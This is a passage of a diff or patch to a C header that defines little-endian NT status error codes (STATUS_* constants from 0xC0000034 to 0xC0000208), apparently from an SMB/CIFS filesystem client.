+-#define STATUS_OBJECT_NAME_NOT_FOUND cpu_to_le32(0xC0000034)
+-#define STATUS_OBJECT_NAME_COLLISION cpu_to_le32(0xC0000035)
+-#define STATUS_PORT_DISCONNECTED cpu_to_le32(0xC0000037)
+-#define STATUS_DEVICE_ALREADY_ATTACHED cpu_to_le32(0xC0000038)
+-#define STATUS_OBJECT_PATH_INVALID cpu_to_le32(0xC0000039)
+-#define STATUS_OBJECT_PATH_NOT_FOUND cpu_to_le32(0xC000003A)
+-#define STATUS_OBJECT_PATH_SYNTAX_BAD cpu_to_le32(0xC000003B)
+-#define STATUS_DATA_OVERRUN cpu_to_le32(0xC000003C)
+-#define STATUS_DATA_LATE_ERROR cpu_to_le32(0xC000003D)
+-#define STATUS_DATA_ERROR cpu_to_le32(0xC000003E)
+-#define STATUS_CRC_ERROR cpu_to_le32(0xC000003F)
+-#define STATUS_SECTION_TOO_BIG cpu_to_le32(0xC0000040)
+-#define STATUS_PORT_CONNECTION_REFUSED cpu_to_le32(0xC0000041)
+-#define STATUS_INVALID_PORT_HANDLE cpu_to_le32(0xC0000042)
+-#define STATUS_SHARING_VIOLATION cpu_to_le32(0xC0000043)
+-#define STATUS_QUOTA_EXCEEDED cpu_to_le32(0xC0000044)
+-#define STATUS_INVALID_PAGE_PROTECTION cpu_to_le32(0xC0000045)
+-#define STATUS_MUTANT_NOT_OWNED cpu_to_le32(0xC0000046)
+-#define STATUS_SEMAPHORE_LIMIT_EXCEEDED cpu_to_le32(0xC0000047)
+-#define STATUS_PORT_ALREADY_SET cpu_to_le32(0xC0000048)
+-#define STATUS_SECTION_NOT_IMAGE cpu_to_le32(0xC0000049)
+-#define STATUS_SUSPEND_COUNT_EXCEEDED cpu_to_le32(0xC000004A)
+-#define STATUS_THREAD_IS_TERMINATING cpu_to_le32(0xC000004B)
+-#define STATUS_BAD_WORKING_SET_LIMIT cpu_to_le32(0xC000004C)
+-#define STATUS_INCOMPATIBLE_FILE_MAP cpu_to_le32(0xC000004D)
+-#define STATUS_SECTION_PROTECTION cpu_to_le32(0xC000004E)
+-#define STATUS_EAS_NOT_SUPPORTED cpu_to_le32(0xC000004F)
+-#define STATUS_EA_TOO_LARGE cpu_to_le32(0xC0000050)
+-#define STATUS_NONEXISTENT_EA_ENTRY cpu_to_le32(0xC0000051)
+-#define STATUS_NO_EAS_ON_FILE cpu_to_le32(0xC0000052)
+-#define STATUS_EA_CORRUPT_ERROR cpu_to_le32(0xC0000053)
+-#define STATUS_FILE_LOCK_CONFLICT cpu_to_le32(0xC0000054)
+-#define STATUS_LOCK_NOT_GRANTED cpu_to_le32(0xC0000055)
+-#define STATUS_DELETE_PENDING cpu_to_le32(0xC0000056)
+-#define STATUS_CTL_FILE_NOT_SUPPORTED cpu_to_le32(0xC0000057)
+-#define STATUS_UNKNOWN_REVISION cpu_to_le32(0xC0000058)
+-#define STATUS_REVISION_MISMATCH cpu_to_le32(0xC0000059)
+-#define STATUS_INVALID_OWNER cpu_to_le32(0xC000005A)
+-#define STATUS_INVALID_PRIMARY_GROUP cpu_to_le32(0xC000005B)
+-#define STATUS_NO_IMPERSONATION_TOKEN cpu_to_le32(0xC000005C)
+-#define STATUS_CANT_DISABLE_MANDATORY cpu_to_le32(0xC000005D)
+-#define STATUS_NO_LOGON_SERVERS cpu_to_le32(0xC000005E)
+-#define STATUS_NO_SUCH_LOGON_SESSION cpu_to_le32(0xC000005F)
+-#define STATUS_NO_SUCH_PRIVILEGE cpu_to_le32(0xC0000060)
+-#define STATUS_PRIVILEGE_NOT_HELD cpu_to_le32(0xC0000061)
+-#define STATUS_INVALID_ACCOUNT_NAME cpu_to_le32(0xC0000062)
+-#define STATUS_USER_EXISTS cpu_to_le32(0xC0000063)
+-#define STATUS_NO_SUCH_USER cpu_to_le32(0xC0000064)
+-#define STATUS_GROUP_EXISTS cpu_to_le32(0xC0000065)
+-#define STATUS_NO_SUCH_GROUP cpu_to_le32(0xC0000066)
+-#define STATUS_MEMBER_IN_GROUP cpu_to_le32(0xC0000067)
+-#define STATUS_MEMBER_NOT_IN_GROUP cpu_to_le32(0xC0000068)
+-#define STATUS_LAST_ADMIN cpu_to_le32(0xC0000069)
+-#define STATUS_WRONG_PASSWORD cpu_to_le32(0xC000006A)
+-#define STATUS_ILL_FORMED_PASSWORD cpu_to_le32(0xC000006B)
+-#define STATUS_PASSWORD_RESTRICTION cpu_to_le32(0xC000006C)
+-#define STATUS_LOGON_FAILURE cpu_to_le32(0xC000006D)
+-#define STATUS_ACCOUNT_RESTRICTION cpu_to_le32(0xC000006E)
+-#define STATUS_INVALID_LOGON_HOURS cpu_to_le32(0xC000006F)
+-#define STATUS_INVALID_WORKSTATION cpu_to_le32(0xC0000070)
+-#define STATUS_PASSWORD_EXPIRED cpu_to_le32(0xC0000071)
+-#define STATUS_ACCOUNT_DISABLED cpu_to_le32(0xC0000072)
+-#define STATUS_NONE_MAPPED cpu_to_le32(0xC0000073)
+-#define STATUS_TOO_MANY_LUIDS_REQUESTED cpu_to_le32(0xC0000074)
+-#define STATUS_LUIDS_EXHAUSTED cpu_to_le32(0xC0000075)
+-#define STATUS_INVALID_SUB_AUTHORITY cpu_to_le32(0xC0000076)
+-#define STATUS_INVALID_ACL cpu_to_le32(0xC0000077)
+-#define STATUS_INVALID_SID cpu_to_le32(0xC0000078)
+-#define STATUS_INVALID_SECURITY_DESCR cpu_to_le32(0xC0000079)
+-#define STATUS_PROCEDURE_NOT_FOUND cpu_to_le32(0xC000007A)
+-#define STATUS_INVALID_IMAGE_FORMAT cpu_to_le32(0xC000007B)
+-#define STATUS_NO_TOKEN cpu_to_le32(0xC000007C)
+-#define STATUS_BAD_INHERITANCE_ACL cpu_to_le32(0xC000007D)
+-#define STATUS_RANGE_NOT_LOCKED cpu_to_le32(0xC000007E)
+-#define STATUS_DISK_FULL cpu_to_le32(0xC000007F)
+-#define STATUS_SERVER_DISABLED cpu_to_le32(0xC0000080)
+-#define STATUS_SERVER_NOT_DISABLED cpu_to_le32(0xC0000081)
+-#define STATUS_TOO_MANY_GUIDS_REQUESTED cpu_to_le32(0xC0000082)
+-#define STATUS_GUIDS_EXHAUSTED cpu_to_le32(0xC0000083)
+-#define STATUS_INVALID_ID_AUTHORITY cpu_to_le32(0xC0000084)
+-#define STATUS_AGENTS_EXHAUSTED cpu_to_le32(0xC0000085)
+-#define STATUS_INVALID_VOLUME_LABEL cpu_to_le32(0xC0000086)
+-#define STATUS_SECTION_NOT_EXTENDED cpu_to_le32(0xC0000087)
+-#define STATUS_NOT_MAPPED_DATA cpu_to_le32(0xC0000088)
+-#define STATUS_RESOURCE_DATA_NOT_FOUND cpu_to_le32(0xC0000089)
+-#define STATUS_RESOURCE_TYPE_NOT_FOUND cpu_to_le32(0xC000008A)
+-#define STATUS_RESOURCE_NAME_NOT_FOUND cpu_to_le32(0xC000008B)
+-#define STATUS_ARRAY_BOUNDS_EXCEEDED cpu_to_le32(0xC000008C)
+-#define STATUS_FLOAT_DENORMAL_OPERAND cpu_to_le32(0xC000008D)
+-#define STATUS_FLOAT_DIVIDE_BY_ZERO cpu_to_le32(0xC000008E)
+-#define STATUS_FLOAT_INEXACT_RESULT cpu_to_le32(0xC000008F)
+-#define STATUS_FLOAT_INVALID_OPERATION cpu_to_le32(0xC0000090)
+-#define STATUS_FLOAT_OVERFLOW cpu_to_le32(0xC0000091)
+-#define STATUS_FLOAT_STACK_CHECK cpu_to_le32(0xC0000092)
+-#define STATUS_FLOAT_UNDERFLOW cpu_to_le32(0xC0000093)
+-#define STATUS_INTEGER_DIVIDE_BY_ZERO cpu_to_le32(0xC0000094)
+-#define STATUS_INTEGER_OVERFLOW cpu_to_le32(0xC0000095)
+-#define STATUS_PRIVILEGED_INSTRUCTION cpu_to_le32(0xC0000096)
+-#define STATUS_TOO_MANY_PAGING_FILES cpu_to_le32(0xC0000097)
+-#define STATUS_FILE_INVALID cpu_to_le32(0xC0000098)
+-#define STATUS_ALLOTTED_SPACE_EXCEEDED cpu_to_le32(0xC0000099)
+-#define STATUS_INSUFFICIENT_RESOURCES cpu_to_le32(0xC000009A)
+-#define STATUS_DFS_EXIT_PATH_FOUND cpu_to_le32(0xC000009B)
+-#define STATUS_DEVICE_DATA_ERROR cpu_to_le32(0xC000009C)
+-#define STATUS_DEVICE_NOT_CONNECTED cpu_to_le32(0xC000009D)
+-#define STATUS_DEVICE_POWER_FAILURE cpu_to_le32(0xC000009E)
+-#define STATUS_FREE_VM_NOT_AT_BASE cpu_to_le32(0xC000009F)
+-#define STATUS_MEMORY_NOT_ALLOCATED cpu_to_le32(0xC00000A0)
+-#define STATUS_WORKING_SET_QUOTA cpu_to_le32(0xC00000A1)
+-#define STATUS_MEDIA_WRITE_PROTECTED cpu_to_le32(0xC00000A2)
+-#define STATUS_DEVICE_NOT_READY cpu_to_le32(0xC00000A3)
+-#define STATUS_INVALID_GROUP_ATTRIBUTES cpu_to_le32(0xC00000A4)
+-#define STATUS_BAD_IMPERSONATION_LEVEL cpu_to_le32(0xC00000A5)
+-#define STATUS_CANT_OPEN_ANONYMOUS cpu_to_le32(0xC00000A6)
+-#define STATUS_BAD_VALIDATION_CLASS cpu_to_le32(0xC00000A7)
+-#define STATUS_BAD_TOKEN_TYPE cpu_to_le32(0xC00000A8)
+-#define STATUS_BAD_MASTER_BOOT_RECORD cpu_to_le32(0xC00000A9)
+-#define STATUS_INSTRUCTION_MISALIGNMENT cpu_to_le32(0xC00000AA)
+-#define STATUS_INSTANCE_NOT_AVAILABLE cpu_to_le32(0xC00000AB)
+-#define STATUS_PIPE_NOT_AVAILABLE cpu_to_le32(0xC00000AC)
+-#define STATUS_INVALID_PIPE_STATE cpu_to_le32(0xC00000AD)
+-#define STATUS_PIPE_BUSY cpu_to_le32(0xC00000AE)
+-#define STATUS_ILLEGAL_FUNCTION cpu_to_le32(0xC00000AF)
+-#define STATUS_PIPE_DISCONNECTED cpu_to_le32(0xC00000B0)
+-#define STATUS_PIPE_CLOSING cpu_to_le32(0xC00000B1)
+-#define STATUS_PIPE_CONNECTED cpu_to_le32(0xC00000B2)
+-#define STATUS_PIPE_LISTENING cpu_to_le32(0xC00000B3)
+-#define STATUS_INVALID_READ_MODE cpu_to_le32(0xC00000B4)
+-#define STATUS_IO_TIMEOUT cpu_to_le32(0xC00000B5)
+-#define STATUS_FILE_FORCED_CLOSED cpu_to_le32(0xC00000B6)
+-#define STATUS_PROFILING_NOT_STARTED cpu_to_le32(0xC00000B7)
+-#define STATUS_PROFILING_NOT_STOPPED cpu_to_le32(0xC00000B8)
+-#define STATUS_COULD_NOT_INTERPRET cpu_to_le32(0xC00000B9)
+-#define STATUS_FILE_IS_A_DIRECTORY cpu_to_le32(0xC00000BA)
+-#define STATUS_NOT_SUPPORTED cpu_to_le32(0xC00000BB)
+-#define STATUS_REMOTE_NOT_LISTENING cpu_to_le32(0xC00000BC)
+-#define STATUS_DUPLICATE_NAME cpu_to_le32(0xC00000BD)
+-#define STATUS_BAD_NETWORK_PATH cpu_to_le32(0xC00000BE)
+-#define STATUS_NETWORK_BUSY cpu_to_le32(0xC00000BF)
+-#define STATUS_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC00000C0)
+-#define STATUS_TOO_MANY_COMMANDS cpu_to_le32(0xC00000C1)
+-#define STATUS_ADAPTER_HARDWARE_ERROR cpu_to_le32(0xC00000C2)
+-#define STATUS_INVALID_NETWORK_RESPONSE cpu_to_le32(0xC00000C3)
+-#define STATUS_UNEXPECTED_NETWORK_ERROR cpu_to_le32(0xC00000C4)
+-#define STATUS_BAD_REMOTE_ADAPTER cpu_to_le32(0xC00000C5)
+-#define STATUS_PRINT_QUEUE_FULL cpu_to_le32(0xC00000C6)
+-#define STATUS_NO_SPOOL_SPACE cpu_to_le32(0xC00000C7)
+-#define STATUS_PRINT_CANCELLED cpu_to_le32(0xC00000C8)
+-#define STATUS_NETWORK_NAME_DELETED cpu_to_le32(0xC00000C9)
+-#define STATUS_NETWORK_ACCESS_DENIED cpu_to_le32(0xC00000CA)
+-#define STATUS_BAD_DEVICE_TYPE cpu_to_le32(0xC00000CB)
+-#define STATUS_BAD_NETWORK_NAME cpu_to_le32(0xC00000CC)
+-#define STATUS_TOO_MANY_NAMES cpu_to_le32(0xC00000CD)
+-#define STATUS_TOO_MANY_SESSIONS cpu_to_le32(0xC00000CE)
+-#define STATUS_SHARING_PAUSED cpu_to_le32(0xC00000CF)
+-#define STATUS_REQUEST_NOT_ACCEPTED cpu_to_le32(0xC00000D0)
+-#define STATUS_REDIRECTOR_PAUSED cpu_to_le32(0xC00000D1)
+-#define STATUS_NET_WRITE_FAULT cpu_to_le32(0xC00000D2)
+-#define STATUS_PROFILING_AT_LIMIT cpu_to_le32(0xC00000D3)
+-#define STATUS_NOT_SAME_DEVICE cpu_to_le32(0xC00000D4)
+-#define STATUS_FILE_RENAMED cpu_to_le32(0xC00000D5)
+-#define STATUS_VIRTUAL_CIRCUIT_CLOSED cpu_to_le32(0xC00000D6)
+-#define STATUS_NO_SECURITY_ON_OBJECT cpu_to_le32(0xC00000D7)
+-#define STATUS_CANT_WAIT cpu_to_le32(0xC00000D8)
+-#define STATUS_PIPE_EMPTY cpu_to_le32(0xC00000D9)
+-#define STATUS_CANT_ACCESS_DOMAIN_INFO cpu_to_le32(0xC00000DA)
+-#define STATUS_CANT_TERMINATE_SELF cpu_to_le32(0xC00000DB)
+-#define STATUS_INVALID_SERVER_STATE cpu_to_le32(0xC00000DC)
+-#define STATUS_INVALID_DOMAIN_STATE cpu_to_le32(0xC00000DD)
+-#define STATUS_INVALID_DOMAIN_ROLE cpu_to_le32(0xC00000DE)
+-#define STATUS_NO_SUCH_DOMAIN cpu_to_le32(0xC00000DF)
+-#define STATUS_DOMAIN_EXISTS cpu_to_le32(0xC00000E0)
+-#define STATUS_DOMAIN_LIMIT_EXCEEDED cpu_to_le32(0xC00000E1)
+-#define STATUS_OPLOCK_NOT_GRANTED cpu_to_le32(0xC00000E2)
+-#define STATUS_INVALID_OPLOCK_PROTOCOL cpu_to_le32(0xC00000E3)
+-#define STATUS_INTERNAL_DB_CORRUPTION cpu_to_le32(0xC00000E4)
+-#define STATUS_INTERNAL_ERROR cpu_to_le32(0xC00000E5)
+-#define STATUS_GENERIC_NOT_MAPPED cpu_to_le32(0xC00000E6)
+-#define STATUS_BAD_DESCRIPTOR_FORMAT cpu_to_le32(0xC00000E7)
+-#define STATUS_INVALID_USER_BUFFER cpu_to_le32(0xC00000E8)
+-#define STATUS_UNEXPECTED_IO_ERROR cpu_to_le32(0xC00000E9)
+-#define STATUS_UNEXPECTED_MM_CREATE_ERR cpu_to_le32(0xC00000EA)
+-#define STATUS_UNEXPECTED_MM_MAP_ERROR cpu_to_le32(0xC00000EB)
+-#define STATUS_UNEXPECTED_MM_EXTEND_ERR cpu_to_le32(0xC00000EC)
+-#define STATUS_NOT_LOGON_PROCESS cpu_to_le32(0xC00000ED)
+-#define STATUS_LOGON_SESSION_EXISTS cpu_to_le32(0xC00000EE)
+-#define STATUS_INVALID_PARAMETER_1 cpu_to_le32(0xC00000EF)
+-#define STATUS_INVALID_PARAMETER_2 cpu_to_le32(0xC00000F0)
+-#define STATUS_INVALID_PARAMETER_3 cpu_to_le32(0xC00000F1)
+-#define STATUS_INVALID_PARAMETER_4 cpu_to_le32(0xC00000F2)
+-#define STATUS_INVALID_PARAMETER_5 cpu_to_le32(0xC00000F3)
+-#define STATUS_INVALID_PARAMETER_6 cpu_to_le32(0xC00000F4)
+-#define STATUS_INVALID_PARAMETER_7 cpu_to_le32(0xC00000F5)
+-#define STATUS_INVALID_PARAMETER_8 cpu_to_le32(0xC00000F6)
+-#define STATUS_INVALID_PARAMETER_9 cpu_to_le32(0xC00000F7)
+-#define STATUS_INVALID_PARAMETER_10 cpu_to_le32(0xC00000F8)
+-#define STATUS_INVALID_PARAMETER_11 cpu_to_le32(0xC00000F9)
+-#define STATUS_INVALID_PARAMETER_12 cpu_to_le32(0xC00000FA)
+-#define STATUS_REDIRECTOR_NOT_STARTED cpu_to_le32(0xC00000FB)
+-#define STATUS_REDIRECTOR_STARTED cpu_to_le32(0xC00000FC)
+-#define STATUS_STACK_OVERFLOW cpu_to_le32(0xC00000FD)
+-#define STATUS_NO_SUCH_PACKAGE cpu_to_le32(0xC00000FE)
+-#define STATUS_BAD_FUNCTION_TABLE cpu_to_le32(0xC00000FF)
+-#define STATUS_VARIABLE_NOT_FOUND cpu_to_le32(0xC0000100)
+-#define STATUS_DIRECTORY_NOT_EMPTY cpu_to_le32(0xC0000101)
+-#define STATUS_FILE_CORRUPT_ERROR cpu_to_le32(0xC0000102)
+-#define STATUS_NOT_A_DIRECTORY cpu_to_le32(0xC0000103)
+-#define STATUS_BAD_LOGON_SESSION_STATE cpu_to_le32(0xC0000104)
+-#define STATUS_LOGON_SESSION_COLLISION cpu_to_le32(0xC0000105)
+-#define STATUS_NAME_TOO_LONG cpu_to_le32(0xC0000106)
+-#define STATUS_FILES_OPEN cpu_to_le32(0xC0000107)
+-#define STATUS_CONNECTION_IN_USE cpu_to_le32(0xC0000108)
+-#define STATUS_MESSAGE_NOT_FOUND cpu_to_le32(0xC0000109)
+-#define STATUS_PROCESS_IS_TERMINATING cpu_to_le32(0xC000010A)
+-#define STATUS_INVALID_LOGON_TYPE cpu_to_le32(0xC000010B)
+-#define STATUS_NO_GUID_TRANSLATION cpu_to_le32(0xC000010C)
+-#define STATUS_CANNOT_IMPERSONATE cpu_to_le32(0xC000010D)
+-#define STATUS_IMAGE_ALREADY_LOADED cpu_to_le32(0xC000010E)
+-#define STATUS_ABIOS_NOT_PRESENT cpu_to_le32(0xC000010F)
+-#define STATUS_ABIOS_LID_NOT_EXIST cpu_to_le32(0xC0000110)
+-#define STATUS_ABIOS_LID_ALREADY_OWNED cpu_to_le32(0xC0000111)
+-#define STATUS_ABIOS_NOT_LID_OWNER cpu_to_le32(0xC0000112)
+-#define STATUS_ABIOS_INVALID_COMMAND cpu_to_le32(0xC0000113)
+-#define STATUS_ABIOS_INVALID_LID cpu_to_le32(0xC0000114)
+-#define STATUS_ABIOS_SELECTOR_NOT_AVAILABLE cpu_to_le32(0xC0000115)
+-#define STATUS_ABIOS_INVALID_SELECTOR cpu_to_le32(0xC0000116)
+-#define STATUS_NO_LDT cpu_to_le32(0xC0000117)
+-#define STATUS_INVALID_LDT_SIZE cpu_to_le32(0xC0000118)
+-#define STATUS_INVALID_LDT_OFFSET cpu_to_le32(0xC0000119)
+-#define STATUS_INVALID_LDT_DESCRIPTOR cpu_to_le32(0xC000011A)
+-#define STATUS_INVALID_IMAGE_NE_FORMAT cpu_to_le32(0xC000011B)
+-#define STATUS_RXACT_INVALID_STATE cpu_to_le32(0xC000011C)
+-#define STATUS_RXACT_COMMIT_FAILURE cpu_to_le32(0xC000011D)
+-#define STATUS_MAPPED_FILE_SIZE_ZERO cpu_to_le32(0xC000011E)
+-#define STATUS_TOO_MANY_OPENED_FILES cpu_to_le32(0xC000011F)
+-#define STATUS_CANCELLED cpu_to_le32(0xC0000120)
+-#define STATUS_CANNOT_DELETE cpu_to_le32(0xC0000121)
+-#define STATUS_INVALID_COMPUTER_NAME cpu_to_le32(0xC0000122)
+-#define STATUS_FILE_DELETED cpu_to_le32(0xC0000123)
+-#define STATUS_SPECIAL_ACCOUNT cpu_to_le32(0xC0000124)
+-#define STATUS_SPECIAL_GROUP cpu_to_le32(0xC0000125)
+-#define STATUS_SPECIAL_USER cpu_to_le32(0xC0000126)
+-#define STATUS_MEMBERS_PRIMARY_GROUP cpu_to_le32(0xC0000127)
+-#define STATUS_FILE_CLOSED cpu_to_le32(0xC0000128)
+-#define STATUS_TOO_MANY_THREADS cpu_to_le32(0xC0000129)
+-#define STATUS_THREAD_NOT_IN_PROCESS cpu_to_le32(0xC000012A)
+-#define STATUS_TOKEN_ALREADY_IN_USE cpu_to_le32(0xC000012B)
+-#define STATUS_PAGEFILE_QUOTA_EXCEEDED cpu_to_le32(0xC000012C)
+-#define STATUS_COMMITMENT_LIMIT cpu_to_le32(0xC000012D)
+-#define STATUS_INVALID_IMAGE_LE_FORMAT cpu_to_le32(0xC000012E)
+-#define STATUS_INVALID_IMAGE_NOT_MZ cpu_to_le32(0xC000012F)
+-#define STATUS_INVALID_IMAGE_PROTECT cpu_to_le32(0xC0000130)
+-#define STATUS_INVALID_IMAGE_WIN_16 cpu_to_le32(0xC0000131)
+-#define STATUS_LOGON_SERVER_CONFLICT cpu_to_le32(0xC0000132)
+-#define STATUS_TIME_DIFFERENCE_AT_DC cpu_to_le32(0xC0000133)
+-#define STATUS_SYNCHRONIZATION_REQUIRED cpu_to_le32(0xC0000134)
+-#define STATUS_DLL_NOT_FOUND cpu_to_le32(0xC0000135)
+-#define STATUS_OPEN_FAILED cpu_to_le32(0xC0000136)
+-#define STATUS_IO_PRIVILEGE_FAILED cpu_to_le32(0xC0000137)
+-#define STATUS_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000138)
+-#define STATUS_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000139)
+-#define STATUS_CONTROL_C_EXIT cpu_to_le32(0xC000013A)
+-#define STATUS_LOCAL_DISCONNECT cpu_to_le32(0xC000013B)
+-#define STATUS_REMOTE_DISCONNECT cpu_to_le32(0xC000013C)
+-#define STATUS_REMOTE_RESOURCES cpu_to_le32(0xC000013D)
+-#define STATUS_LINK_FAILED cpu_to_le32(0xC000013E)
+-#define STATUS_LINK_TIMEOUT cpu_to_le32(0xC000013F)
+-#define STATUS_INVALID_CONNECTION cpu_to_le32(0xC0000140)
+-#define STATUS_INVALID_ADDRESS cpu_to_le32(0xC0000141)
+-#define STATUS_DLL_INIT_FAILED cpu_to_le32(0xC0000142)
+-#define STATUS_MISSING_SYSTEMFILE cpu_to_le32(0xC0000143)
+-#define STATUS_UNHANDLED_EXCEPTION cpu_to_le32(0xC0000144)
+-#define STATUS_APP_INIT_FAILURE cpu_to_le32(0xC0000145)
+-#define STATUS_PAGEFILE_CREATE_FAILED cpu_to_le32(0xC0000146)
+-#define STATUS_NO_PAGEFILE cpu_to_le32(0xC0000147)
+-#define STATUS_INVALID_LEVEL cpu_to_le32(0xC0000148)
+-#define STATUS_WRONG_PASSWORD_CORE cpu_to_le32(0xC0000149)
+-#define STATUS_ILLEGAL_FLOAT_CONTEXT cpu_to_le32(0xC000014A)
+-#define STATUS_PIPE_BROKEN cpu_to_le32(0xC000014B)
+-#define STATUS_REGISTRY_CORRUPT cpu_to_le32(0xC000014C)
+-#define STATUS_REGISTRY_IO_FAILED cpu_to_le32(0xC000014D)
+-#define STATUS_NO_EVENT_PAIR cpu_to_le32(0xC000014E)
+-#define STATUS_UNRECOGNIZED_VOLUME cpu_to_le32(0xC000014F)
+-#define STATUS_SERIAL_NO_DEVICE_INITED cpu_to_le32(0xC0000150)
+-#define STATUS_NO_SUCH_ALIAS cpu_to_le32(0xC0000151)
+-#define STATUS_MEMBER_NOT_IN_ALIAS cpu_to_le32(0xC0000152)
+-#define STATUS_MEMBER_IN_ALIAS cpu_to_le32(0xC0000153)
+-#define STATUS_ALIAS_EXISTS cpu_to_le32(0xC0000154)
+-#define STATUS_LOGON_NOT_GRANTED cpu_to_le32(0xC0000155)
+-#define STATUS_TOO_MANY_SECRETS cpu_to_le32(0xC0000156)
+-#define STATUS_SECRET_TOO_LONG cpu_to_le32(0xC0000157)
+-#define STATUS_INTERNAL_DB_ERROR cpu_to_le32(0xC0000158)
+-#define STATUS_FULLSCREEN_MODE cpu_to_le32(0xC0000159)
+-#define STATUS_TOO_MANY_CONTEXT_IDS cpu_to_le32(0xC000015A)
+-#define STATUS_LOGON_TYPE_NOT_GRANTED cpu_to_le32(0xC000015B)
+-#define STATUS_NOT_REGISTRY_FILE cpu_to_le32(0xC000015C)
+-#define STATUS_NT_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000015D)
+-#define STATUS_DOMAIN_CTRLR_CONFIG_ERROR cpu_to_le32(0xC000015E)
+-#define STATUS_FT_MISSING_MEMBER cpu_to_le32(0xC000015F)
+-#define STATUS_ILL_FORMED_SERVICE_ENTRY cpu_to_le32(0xC0000160)
+-#define STATUS_ILLEGAL_CHARACTER cpu_to_le32(0xC0000161)
+-#define STATUS_UNMAPPABLE_CHARACTER cpu_to_le32(0xC0000162)
+-#define STATUS_UNDEFINED_CHARACTER cpu_to_le32(0xC0000163)
+-#define STATUS_FLOPPY_VOLUME cpu_to_le32(0xC0000164)
+-#define STATUS_FLOPPY_ID_MARK_NOT_FOUND cpu_to_le32(0xC0000165)
+-#define STATUS_FLOPPY_WRONG_CYLINDER cpu_to_le32(0xC0000166)
+-#define STATUS_FLOPPY_UNKNOWN_ERROR cpu_to_le32(0xC0000167)
+-#define STATUS_FLOPPY_BAD_REGISTERS cpu_to_le32(0xC0000168)
+-#define STATUS_DISK_RECALIBRATE_FAILED cpu_to_le32(0xC0000169)
+-#define STATUS_DISK_OPERATION_FAILED cpu_to_le32(0xC000016A)
+-#define STATUS_DISK_RESET_FAILED cpu_to_le32(0xC000016B)
+-#define STATUS_SHARED_IRQ_BUSY cpu_to_le32(0xC000016C)
+-#define STATUS_FT_ORPHANING cpu_to_le32(0xC000016D)
+-#define STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT cpu_to_le32(0xC000016E)
+-#define STATUS_PARTITION_FAILURE cpu_to_le32(0xC0000172)
+-#define STATUS_INVALID_BLOCK_LENGTH cpu_to_le32(0xC0000173)
+-#define STATUS_DEVICE_NOT_PARTITIONED cpu_to_le32(0xC0000174)
+-#define STATUS_UNABLE_TO_LOCK_MEDIA cpu_to_le32(0xC0000175)
+-#define STATUS_UNABLE_TO_UNLOAD_MEDIA cpu_to_le32(0xC0000176)
+-#define STATUS_EOM_OVERFLOW cpu_to_le32(0xC0000177)
+-#define STATUS_NO_MEDIA cpu_to_le32(0xC0000178)
+-#define STATUS_NO_SUCH_MEMBER cpu_to_le32(0xC000017A)
+-#define STATUS_INVALID_MEMBER cpu_to_le32(0xC000017B)
+-#define STATUS_KEY_DELETED cpu_to_le32(0xC000017C)
+-#define STATUS_NO_LOG_SPACE cpu_to_le32(0xC000017D)
+-#define STATUS_TOO_MANY_SIDS cpu_to_le32(0xC000017E)
+-#define STATUS_LM_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000017F)
+-#define STATUS_KEY_HAS_CHILDREN cpu_to_le32(0xC0000180)
+-#define STATUS_CHILD_MUST_BE_VOLATILE cpu_to_le32(0xC0000181)
+-#define STATUS_DEVICE_CONFIGURATION_ERROR cpu_to_le32(0xC0000182)
+-#define STATUS_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC0000183)
+-#define STATUS_INVALID_DEVICE_STATE cpu_to_le32(0xC0000184)
+-#define STATUS_IO_DEVICE_ERROR cpu_to_le32(0xC0000185)
+-#define STATUS_DEVICE_PROTOCOL_ERROR cpu_to_le32(0xC0000186)
+-#define STATUS_BACKUP_CONTROLLER cpu_to_le32(0xC0000187)
+-#define STATUS_LOG_FILE_FULL cpu_to_le32(0xC0000188)
+-#define STATUS_TOO_LATE cpu_to_le32(0xC0000189)
+-#define STATUS_NO_TRUST_LSA_SECRET cpu_to_le32(0xC000018A)
+-#define STATUS_NO_TRUST_SAM_ACCOUNT cpu_to_le32(0xC000018B)
+-#define STATUS_TRUSTED_DOMAIN_FAILURE cpu_to_le32(0xC000018C)
+-#define STATUS_TRUSTED_RELATIONSHIP_FAILURE cpu_to_le32(0xC000018D)
+-#define STATUS_EVENTLOG_FILE_CORRUPT cpu_to_le32(0xC000018E)
+-#define STATUS_EVENTLOG_CANT_START cpu_to_le32(0xC000018F)
+-#define STATUS_TRUST_FAILURE cpu_to_le32(0xC0000190)
+-#define STATUS_MUTANT_LIMIT_EXCEEDED cpu_to_le32(0xC0000191)
+-#define STATUS_NETLOGON_NOT_STARTED cpu_to_le32(0xC0000192)
+-#define STATUS_ACCOUNT_EXPIRED cpu_to_le32(0xC0000193)
+-#define STATUS_POSSIBLE_DEADLOCK cpu_to_le32(0xC0000194)
+-#define STATUS_NETWORK_CREDENTIAL_CONFLICT cpu_to_le32(0xC0000195)
+-#define STATUS_REMOTE_SESSION_LIMIT cpu_to_le32(0xC0000196)
+-#define STATUS_EVENTLOG_FILE_CHANGED cpu_to_le32(0xC0000197)
+-#define STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT cpu_to_le32(0xC0000198)
+-#define STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT cpu_to_le32(0xC0000199)
+-#define STATUS_NOLOGON_SERVER_TRUST_ACCOUNT cpu_to_le32(0xC000019A)
+-#define STATUS_DOMAIN_TRUST_INCONSISTENT cpu_to_le32(0xC000019B)
+-#define STATUS_FS_DRIVER_REQUIRED cpu_to_le32(0xC000019C)
+-#define STATUS_IMAGE_ALREADY_LOADED_AS_DLL cpu_to_le32(0xC000019D)
+-#define STATUS_NETWORK_OPEN_RESTRICTION cpu_to_le32(0xC0000201)
+-#define STATUS_NO_USER_SESSION_KEY cpu_to_le32(0xC0000202)
+-#define STATUS_USER_SESSION_DELETED cpu_to_le32(0xC0000203)
+-#define STATUS_RESOURCE_LANG_NOT_FOUND cpu_to_le32(0xC0000204)
+-#define STATUS_INSUFF_SERVER_RESOURCES cpu_to_le32(0xC0000205)
+-#define STATUS_INVALID_BUFFER_SIZE cpu_to_le32(0xC0000206)
+-#define STATUS_INVALID_ADDRESS_COMPONENT cpu_to_le32(0xC0000207)
+-#define STATUS_INVALID_ADDRESS_WILDCARD cpu_to_le32(0xC0000208)
